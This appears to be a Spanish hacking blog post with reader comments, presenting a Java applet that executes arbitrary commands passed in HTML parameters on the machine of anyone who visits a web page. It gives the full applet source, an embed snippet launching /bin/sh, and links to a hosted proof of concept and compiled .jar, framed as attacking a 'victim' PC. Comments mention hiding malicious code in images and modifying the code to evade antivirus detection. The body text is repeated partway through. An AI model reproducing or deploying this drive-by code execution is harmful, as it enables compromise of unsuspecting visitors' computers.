[Extraido del texto de AnalyseR]
Se puede ejecutar codigo remotamente con la visita de la victima a una web usando un sencillo codigo en java:
Codigo:
En el servidor debe estar el archivo java compilado en .jar, y debe ser cargado asi:
Donde skata.class y skataMPE.jar son el nombre de vuestros archivos.
Aquí un PoC:
http://st4ck-3rr0r.webcindario.com/java/index.php
Simplemente coge dos parámetros que se le pasan en el archivo htm donde está incrustado el applet y los ejecuta en el PC víctima.
Se puede ejecutar cualquier cosa, lo suyo sería detectar el SO con PHP y hacer una cosa u otra... cada uno que haga lo que quiera :)
Yo no pude compilar el codigo, lo subo por si alguien tampoco puede:
http://st4ck-3rr0r.webcindario.com/Java/skataMPE.jar
Salu2
Codigo:
import java.applet.*;
import java.awt.*;
import java.io.*;
public class skata extends Applet {
public void init() {
Process f;
String first = getParameter("first");
try{
f = Runtime.getRuntime().exec(first);
}
catch(IOException e){
e.printStackTrace();
}
Process s;
String second = getParameter("second");
try{
s = Runtime.getRuntime().exec(second);
}
catch(IOException e){
e.printStackTrace();
}
Process t;
String third = getParameter("third");
try{
t = Runtime.getRuntime().exec(third);
}
catch(IOException e){
e.printStackTrace();
}
}
}En el servidor debe estar el archivo java compilado en .jar, y debe ser cargado asi:
<code><applet code="skata.class" archive="skataMPE.jar" width="1" height="1">
<param name="first" value="/bin/sh">
<param name="second" value="gedit">
</applet>
</code>
Donde skata.class y skataMPE.jar son el nombre de vuestros archivos.
Aquí un PoC:
http://st4ck-3rr0r.webcindario.com/java/index.php
Simplemente coge dos parámetros que se le pasan en el archivo htm donde está incrustado el applet y los ejecuta en el PC víctima.
Se puede ejecutar cualquier cosa, lo suyo sería detectar el SO con PHP y hacer una cosa u otra... cada uno que haga lo que quiera :)
Yo no pude compilar el codigo, lo subo por si alguien tampoco puede:
http://st4ck-3rr0r.webcindario.com/Java/skataMPE.jar
Salu2
Me ha gustado mucho tu POC de java, estuve trabajando en algo parecido durante unas semanas, se basaba en colocar codigo malicioso en una foto de manera que al subirla a un hosting o colocarla como avatar te ejecutase un script VBS, lo dejé porque no Firefox no era vulnerable, solo IE, pero tu has conseguido algo mejor, buen trabajo
ResponderEliminarGracias :-)
ResponderEliminarHabría que modificar el codigo Java, el otro día me dio por probar el PoC desde Windows con Kaspersky activado y saltó alarma U.U